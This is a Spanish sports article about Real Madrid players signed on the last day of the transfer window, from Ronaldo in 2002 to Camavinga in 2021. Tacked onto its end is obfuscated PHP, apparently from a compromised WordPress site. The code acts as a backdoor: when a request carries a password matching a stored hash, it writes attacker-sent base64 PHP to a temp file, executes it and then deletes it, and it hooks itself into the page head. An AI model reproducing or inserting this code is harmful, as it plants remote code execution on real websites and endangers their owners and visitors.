Los fichajes de última hora del Real Madrid: Ramos, Bale…

Desde 2002, hasta ocho jugadores han firmado por el equipo blanco en el último día del mercado. Ronaldo, Ramos, Bale o Camavinga son algunas de estas incorporaciones en los instantes finales.

Como otros años, las grandes ligas han vuelto a ponerse de acuerdo para que el final del mercado de fichajes de verano se alargue un día más, hasta el 1 de septiembre. Habitualmente, cada 31 de agosto, las oficinas de muchos clubes echan humo. Los equipos ultiman la llegada y salida de futbolistas para tener cerrada una plantilla competitiva para la temporada. El Real Madrid acostumbra a tener los deberes hechos con antelación aunque, a lo largo del siglo XXI, el club ha protagonizado hasta ocho fichajes sobre la bocina, incorporando nombres que han dejado una huella imborrable en la historia del club.

El primer jugador que el Real Madrid fichó durante el último día de mercado de este siglo fue Ronaldo Nazario. El delantero llegó en 2002 al Santiago Bernabéu. Su elegancia en el campo y sus goles legendarios lo convirtieron en uno de los mejores delanteros de todos los tiempos yen parte integral de la historia del Real Madrid. El brasileño vistió de blanco hasta el mercado invernal de la temporada 2006-07, cuando, tras una disputa con el entonces entrenador, Fabio Capello, fue traspasado al Milan. Había jugado 177 partidos oficiales con el Real Madrid, habiendo logrado 104 goles.

Del último día al liderazgo eterno

2005 trajo consigo un fichaje que transformaría la defensa del Real Madrid para siempre. Sergio Ramos aterrizó en el Bernabéu en el último día del mercado. Con su pasión y liderazgo en el terreno de juego, Ramos se convirtió en un icono del club, capitaneando al equipo a numerosos éxitos y dejando una marca imborrable en la historia madridista. Lució la camiseta blanca en 671 ocasiones, marcando 101 tantos: el más importante fue el que logró en la final de la Champions de 2014, cuando remató un centro de Modric para empatar la final y llevarla a la prórroga en el minuto 92:48.

Ocho años más tarde, en 2013,la entidad madrileña rompió el mercado con la llegada de Gareth Bale. El galés, en su primera temporada, fue clave para la conquista de la Copa del Rey ante el Barcelona, en el que marcó un golazo tras recorrer casi 60 metros, dejando atrás a Bartra antes de superar a Pinto, y también en la Décima, al rematar de cabeza el segundo gol de los blanco pero, con el paso de las temporadas, fue perdiendo protagonismo. Aún así dejó su huella al lograr cinco Champions en 258 partidos, con 106 tantos.

Cesiones sobre la campana

En 2006, el Real Madrid y Arsenal concretaron el traspaso, en forma de cesión, de José Antonio Reyes. El de Utrera tuvo un papel importante para que el Real Madrid consiguiera romper la racha negativa de tres temporadas sin títulos con la consecución de la Liga. Tras el préstamo de último momento de Reyes, el club blanco estuvo seis temporadas sin dar sorpresas de última hora en el mercado, hasta que en 2012, otro equipo de Londres, el Chelsea, acordase con el Real Madrid la cesión de Essien.

Chicharito y Areola también llegaron cedidos el último día de mercado. El mexicano llegó en 2014 y cuajó una buena temporada con la camiseta blanca, marcando nueve goles y nueve asistencias. Por su parte, el portero francés apenas disputó nueve encuentros en los que encajó 11 tantos.

El resplandor del presente y futuro

El capítulo más reciente en la saga de fichajes de última hora del Real Madrid es Eduardo Camavinga. En 2021, el joven mediocampista francés se unió al equipo en el último suspiro del mercado. A pesar de su corto tiempo en el club, ha demostrado tener una gran personalidad y un gran nivel que le ha llevado a ser titular indiscutible.

El cierre del mercado de fichajes veraniego es sinónimo de tensión, expectativas y, a menudo, sorpresas de última hora. Y cuando se trata del Real Madrid, esta época del año ha sido testigo de giros inesperados que han dejado a los aficionados con el corazón en vilo, aunque, seguramente, este año no habrá sorpresas de última hora porque Ancelotti, tras la lesión de Vinicius ante el Celta, aseguró que la plantilla está completa…

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}